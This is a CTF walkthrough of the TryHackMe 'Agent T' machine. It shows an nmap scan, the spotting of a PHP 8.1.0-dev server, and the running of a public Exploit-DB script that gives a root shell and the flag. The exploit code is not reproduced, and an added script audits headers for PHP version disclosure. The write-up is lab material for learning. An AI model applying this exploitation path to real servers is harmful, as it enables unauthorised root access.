Agent T TryHackMe Walkthrough

In this article, I will be sharing a walkthrough of Agent T from TryHackMe. This is an easy-level machine which involves exploiting a vulnerable version of PHP installed on the web server to get a root shell. Let's get started!

Initial Enumeration

I started the initial enumeration by running a port scan using nmap looking for open ports and running services.

┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ nmap -sC -sV -oN nmap/initial 10.10.223.96           
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 06:40 IST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.10.223.96
Host is up (0.20s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.88 seconds

We have only one HTTP port open which is running a PHP web server. Let's open our web browser and see what's running on the webserver.

I checked the website; it uses a Bootstrap theme and does not have much functionality. Next, I performed a dirb scan to search for hidden files and directories, but it also did not give us anything useful.

From the nmap scan, we know that the website is running a PHP cli server 5.5 or later (PHP 8.1.0-dev). I searched for this version name on Google and found that this version is vulnerable to remote code execution.
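The banner that gave the version away here can be audited on your own hosts. The following is an added example, not code from the original article: it parses HTTP response headers and flags a PHP version disclosure and any pre-release build such as 8.1.0-dev. The sample response, function names and finding labels are constructed for illustration.

```python
import re

# Constructed sample response (not captured from the machine in the article).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Host: 10.10.223.96\r\n"
    "Connection: close\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Matches "PHP/8.1.0", "PHP/8.1.0-dev", "PHP/8.1.0RC1", also inside a longer banner.
PHP_BANNER = re.compile(r"PHP/(\d+)\.(\d+)\.(\d+)(?:-?([A-Za-z]+)(\d*))?")
PRE_RELEASE_TAGS = {"dev", "alpha", "beta", "rc"}


def parse_headers(raw):
    """Return response headers as a dict with lower-cased names."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def audit_php_banner(raw):
    """Flag PHP version disclosure and pre-release builds in a raw response."""
    headers = parse_headers(raw)
    findings = []
    for name in ("x-powered-by", "server"):
        match = PHP_BANNER.search(headers.get(name, ""))
        if not match:
            continue
        version = ".".join(match.group(1, 2, 3))
        tag = (match.group(4) or "").lower()
        findings.append(f"version-disclosure: {name} reveals PHP {version}")
        if tag in PRE_RELEASE_TAGS:
            findings.append(
                f"pre-release-build: PHP {version}-{tag} is not a stable release"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_php_banner(SAMPLE_RESPONSE):
        print(finding)
```

Setting `expose_php = Off` in php.ini removes the `X-Powered-By` header, but the underlying fix is to run a stable, patched PHP release rather than a development build.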

I found this exploit written in Python on Exploit-DB. On executing the exploit, I got a shell where we can execute commands as root!

┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ python3 exploit.py 
Enter the full host url:
http://10.10.223.96/

Interactive shell is opened on http://10.10.223.96/ 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

We have the root shell, now we need to find the flag. I searched for the flag.txt or root.txt and found a flag.txt in the / directory.

$ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

$ cat /flag.txt
flag{********************************}

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Delphine Wylin.